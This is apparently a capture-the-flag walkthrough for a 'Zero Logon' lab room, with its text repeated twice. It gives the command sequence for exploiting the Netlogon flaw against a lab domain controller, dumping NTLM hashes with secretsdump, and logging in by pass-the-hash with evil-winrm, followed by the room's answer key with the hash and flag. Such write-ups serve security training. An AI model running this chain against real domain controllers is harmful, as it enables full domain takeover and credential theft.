Zero Logon - Hard

This room covers the walkthrough for the Zero Logon exploit, which abuses a MS-NRPC (Microsoft NetLogon Remote Protocol) feature.
We use the Proof of Concept and the modified script for this exploit to work.

shell

python3 -m pip install virtualenv

python3 -m virtualenv impacketEnv

source impacketEnv/bin/activate

pip install git+https://github.com/SecureAuthCorp/impacket
#setting up impacket in virtualenv

shell

nmap -T4 -A 10.10.187.79
#scan machine to get netbios name

#now we can use the zerologon.py script
python3 zerologon.py
#show syntax

python3 zerologon.py DC01 10.10.187.79
#exploits zero logon, changes password

secretsdump.py -just-dc-ntlm -no-pass DC01\$@10.10.187.79
#dumps hashes given domain controller and IP
#we can use admin hash to connect

evil-winrm -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -i 10.10.187.79
#get access

cd ..\Desktop

type root.txt

What method will allow us to change Passwords over NRPC? - NetrServerPasswordSet2()
What are the required fields for the method per the Microsoft Documentation? - PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword
What Opnumber is the method? - 30
What is the NetBIOS name of the Domain Controller? - DC01
What is the NetBIOS name of the network? - hololive
What domain are you attacking? - hololive.local
What is the Local Administrator's NTLM hash? - 3f3ef89114fb063e3d7fc23c20f65568
How many Domain Admin accounts are there? - 2
What is the root flag? - THM{Zer0Log0nD4rkTh1rty}

Zero Logon - Hard

This room covers the walkthrough for the Zero Logon exploit, which abuses a MS-NRPC (Microsoft NetLogon Remote Protocol) feature.
We use the Proof of Concept and the modified script for this exploit to work.

shell

python3 -m pip install virtualenv

python3 -m virtualenv impacketEnv

source impacketEnv/bin/activate

pip install git+https://github.com/SecureAuthCorp/impacket
#setting up impacket in virtualenv

shell

nmap -T4 -A 10.10.187.79
#scan machine to get netbios name

#now we can use the zerologon.py script
python3 zerologon.py
#show syntax

python3 zerologon.py DC01 10.10.187.79
#exploits zero logon, changes password

secretsdump.py -just-dc-ntlm -no-pass DC01\$@10.10.187.79
#dumps hashes given domain controller and IP
#we can use admin hash to connect

evil-winrm -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -i 10.10.187.79
#get access

cd ..\Desktop

type root.txt

What method will allow us to change Passwords over NRPC? - NetrServerPasswordSet2()
What are the required fields for the method per the Microsoft Documentation? - PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword
What Opnumber is the method? - 30
What is the NetBIOS name of the Domain Controller? - DC01
What is the NetBIOS name of the network? - hololive
What domain are you attacking? - hololive.local
What is the Local Administrator's NTLM hash? - 3f3ef89114fb063e3d7fc23c20f65568
How many Domain Admin accounts are there? - 2
What is the root flag? - THM{Zer0Log0nD4rkTh1rty}